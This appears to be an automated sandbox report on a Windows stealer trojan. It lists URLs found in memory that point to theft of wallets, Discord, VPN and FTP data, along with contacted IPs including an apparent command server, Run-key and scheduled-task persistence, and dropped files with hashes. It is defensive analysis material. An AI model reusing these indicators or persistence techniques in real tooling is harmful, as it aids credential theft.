http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartDiscord	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_real	4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.600215383.0000000003E9D000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartInstalledBrowsersResponse	4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ip.sb	DB3B.exe, 0000001A.00000002.606877992.0000000003EEB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/PartColdWalletsResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	4851.exe, 00000016.00000002.442859715.00000000029B0000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000003.425586737.0000000000DF0000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000000.481000106.0000000000982000.00000008.00020000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	false		high
http://188.124.36.242:25802	DB3B.exe, 0000001A.00000002.600215383.0000000003E9D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse	4851.exe, 00000016.00000002.447200133.00000000048A5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/PartProtonVPNResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/parents/	svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartDiscordResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000D.00000003.309201565.00000225C9449000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.309243583.00000225C945E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_shockwave	4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartFtpConnectionsResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartOpenVPN	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.582211449.0000000003E11000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH	Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartOpenVPNResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000D.00000003.309243583.00000225C945E000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessageD	4851.exe, 00000016.00000002.447601958.0000000004944000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_wmp	4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	false		high
https://fs.microsoft.c-k	svchost.exe, 00000006.00000002.526948835.000002419484D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000D.00000003.309229274.00000225C9461000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_java	4851.exe, 00000016.00000002.453754570.0000000004AEA000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
220.125.1.129	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
185.206.180.136	trustmanager.ug	Bulgaria	205787	PUBLICLOUDBG	false
185.215.113.29	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
188.124.36.242	unknown	Russian Federation	49505	SELECTELRU	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
193.142.59.248	unknown	Netherlands	208046	HOSTSLICK-GERMANYNL	true
218.233.73.202	atvcampingtrips.com	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
193.142.59.123	unknown	Netherlands	208046	HOSTSLICK-GERMANYNL	true
222.236.49.124	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
162.159.134.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	469615
Start date:	23.08.2021
Start time:	02:06:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	xuTyOmef1g.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/45@53/12
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.4% (good quality ratio 7%) Quality average: 65.7% Quality standard deviation: 36.2%
HCA Information:	Successful, ratio: 87% Number of executed functions: 154 Number of non-executed functions: 184
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.203.80.193, 96.16.150.73, 20.190.160.136, 20.190.160.132, 20.190.160.73, 20.190.160.2, 20.190.160.71, 20.190.160.134, 20.190.160.8, 20.190.160.129, 204.79.197.200, 13.107.21.200, 20.50.102.62, 23.211.6.115, 23.211.4.86, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 104.26.13.31, 104.26.12.31, 172.67.75.172, 20.82.209.183 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, api.ip.sb.cdn.cloudflare.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing network information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:07:25	API Interceptor	12x Sleep call for process: svchost.exe modified
02:07:49	Task Scheduler	Run new task: Firefox Default Browser Agent 1871F1458C60532E path: C:\Users\user\AppData\Roaming\uwtjrji
02:08:02	API Interceptor	1x Sleep call for process: explorer.exe modified
02:08:39	API Interceptor	70x Sleep call for process: 4851.exe modified
02:08:44	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
02:08:54	API Interceptor	435x Sleep call for process: rnyuf.exe modified
02:08:58	Task Scheduler	Run new task: rnyuf.exe path: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
02:09:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft.exe C:\Users\user\AppData\Local\Temp\Microsoft.\Microsoft.exe
02:09:26	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run {7C046CF8-759C-4301-A95C-2D5FD8AD23DE} C:\ProgramData\{1D7BD5EC-1EA9-44E8-9114-08DDFBD26AB9}\33A2E4F0.exe
02:09:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft.exe C:\Users\user\AppData\Local\Temp\Microsoft.\Microsoft.exe
02:09:49	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run {7C046CF8-759C-4301-A95C-2D5FD8AD23DE} C:\ProgramData\{1D7BD5EC-1EA9-44E8-9114-08DDFBD26AB9}\33A2E4F0.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5985616952512959
Encrypted:	false
SSDEEP:	6:0FCTnek1GaD0JOCEfMuaaD0JOCEfMKQmDfkAl/gz2cE0fMbhEZolrRSQ2hyYIIT:00GaD0JcaaD0JwQQcAg/0bjSQJ
MD5:	B35963684BEB90BB364413923636930E
SHA1:	EE8DA6897F4E0A4490C78587011E5D10AF381371
SHA-256:	6AEDDD7885F5C82C97302A6E57C0E4DCED44FCEBD6B600593EB0667D5C1DB256
SHA-512:	D282221B87FCBA6591BE304E5768263F518EDE82324905E42D3B929F5CC774E162C14A1DD64E2B1B723E2623A5682D9662E93144183AB6E8939A00FCE2687F24
Malicious:	false
Reputation:	unknown
Preview:	......:{..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xd1d91613, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09681944173099617
Encrypted:	false
SSDEEP:	6:JCGzwl/+V+6RIE11Y8TRXBdy+ZqKXCGzwl/+V+6RIE11Y8TRXBdy+ZqK:JCG0+86O4bl37QKXCG0+86O4bl37QK
MD5:	7BD069111820DF3D705BD6BAB04705A7
SHA1:	9FD37C4C531477B58E7CDDC5B79034329CC63546
SHA-256:	65DCFFDF00F0C057358E88AB8721D5062B95FBE1B450D8D0C2C006D5D2828AEF
SHA-512:	501875D37AA5A031498C0EFE697EBA3F2BC5AAAE70920BCC3C91844E1FCB648AC336476CC901B6328864321E5C8C0D53BA420ACD1A6445D3C671BDFB1BC41D12
Malicious:	false
Reputation:	unknown
Preview:	....... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..............................................................................................................................................................................................................................................y.k..................Y1.....y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.1115988791644607
Encrypted:	false
SSDEEP:	3:hKEv8KFQcSXl/bJdAtiBFAyt7Fill:t8Jc8t4T+ZG
MD5:	2BBC3526212B48D9371042C6FB27AEAF
SHA1:	D941A19CB35CBDF31BC58499F6F8A6D5D09FD827
SHA-256:	5780221F72149DFC249EDE57B30CB49F9B57671672EF26A6491847B7F6A2353F
SHA-512:	9C6B049456E1CE329973F36DABD7859814532E7A473A11F7E5E45E3071AF62ED4D893D55972EDF5B136D3DCD3B6E2BEA1CB96ADEEF0FB33CCEE53C5DF994AF22
Malicious:	false
Reputation:	unknown
Preview:	2./......................................3...w.......y.......w...............w.......w....:O.....w....................Y1.....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4851.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\4851.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2291
Entropy (8bit):	5.3192079301865585
Encrypted:	false
SSDEEP:	48:MIHKmfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHKYHZHAHxLHG1qHu:Pqaq5qXAqLqdqUqzcGYqhQnoPtIxHbqS
MD5:	66D7E07C835F707963009A207CDC770B
SHA1:	8D3D65EA8FD18976FF325E0812F0DD8B6C12F275
SHA-256:	7840FE961948856C25B191A6013E8694CC8E0B80F7B8A6A474C45EB0FB53A336
SHA-512:	F36B511EA43599DB92751D8873EE429D8B5D342BA14E8C9EEC9250A21C2373B2EF10E4E6C8372B8011023FAE8B76E04CF09557186CB6D5B28C44408F661C7955
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Microsoft[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2599240
Entropy (8bit):	7.791151616491937
Encrypted:	false
SSDEEP:	49152:BvnK6yhWGgXqcQ1IHBmvz8hjI5Z8DRT7h629X0+htP/5ANauUH:dnKzoFXqcySgv+jIkDdh6EthtCUH
MD5:	0DEFE1E926B2407EE4A292480D8EBF48
SHA1:	0C526ABB9D066BBDAA2B3D566331C62CA70C2BE1
SHA-256:	3A45E96327700631693D230BBD9645588FDE9F71C97F79FE57AEDF62C1785F3B
SHA-512:	E319ED2F3F83A51E5FD646C28F6E69B47FCD0660C5C3CD751489C1D8892ADE4C2084F53419798B7FF755F484480243D51D82E5420A52D951F6B55224351EAEF4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.[......................$........D.. ... ....@.. ........................f.....m.'...@.................................:...P....`d..............'..............................................................................................text........ ...................... ..`.sdata....... ......................@... .....@......................@..@.reloc.......`......................@..@.idata... ..........................@...\| ..............................`..`.themida.`;..@......................`....boot..... ...C... ..8..............`..`.rsrc.......`d.......%.............@..@........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Explorer[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	429056
Entropy (8bit):	7.545057273303429
Encrypted:	false
SSDEEP:	12288:pMHvKYKsClSPeGZvJLSYXq289GHUp4GJ5DS:4KYKsnBS689Dp4eFS
MD5:	C9ABCBFA7888BB73B892477D0A8112C1
SHA1:	06C97ADEF5E3D10CB070B1769B70DD7C2327087F
SHA-256:	E2F43EA5EA81B67DD888330C2A8F0790F7CBFE0065E612934C7C6F3F0F642BDF
SHA-512:	A227508885CB236B4B4366A25615C763361BD30C25183FC8AF615DA8D40E1C471BCD180AB49C7B9FF165678AC95952E82630EAB52966B1E6CF409686D0E0F079
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.Ib..'1..'1..'1...1..'1...1j.'1...11.'1 .\1..'1..&1..'1...1..'1...1..'1...1..'1Rich..'1........PE..L...$!.^.....................N......."............@..........................0...............................................o..<.......`5..........................`................................f..@............................................text...0........................... ..`.rdata..n...........................@..@.data....b...........n..............@....rsrc...`5.......6...V..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Microsoft[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	1.5219280948873621
Encrypted:	false
SSDEEP:	3:hn:h
MD5:	FDA44910DEB1A460BE4AC5D56D61D837
SHA1:	F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256:	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512:	57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious:	false
Reputation:	unknown
Preview:	0....

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11000893562382316
Encrypted:	false
SSDEEP:	12:265AXm/Ey6q99952ziMmq3qQ10nMCldimE8eawHjc2:265xl68UzTDLyMCldzE9BHjc2
MD5:	60A3B2C1804DBD8AED911BA9B5B79CD2
SHA1:	A6331F04DD6EF587CABB9B08069DE61CE27EBDFA
SHA-256:	BA6131137235CA5B30EA430C8863FA5A53FD3AC0DE98AB818EABDC30AFDC0CF7
SHA-512:	84F11B73878DE2BA5497C451CE7F4E12E7582A5833864B855A2B75C797840A6790C7314EA2FD2ADF2E33FB68F9C09FF55AB6DF81EAC04A198B63F5C45B9198EF
Malicious:	false
Reputation:	unknown
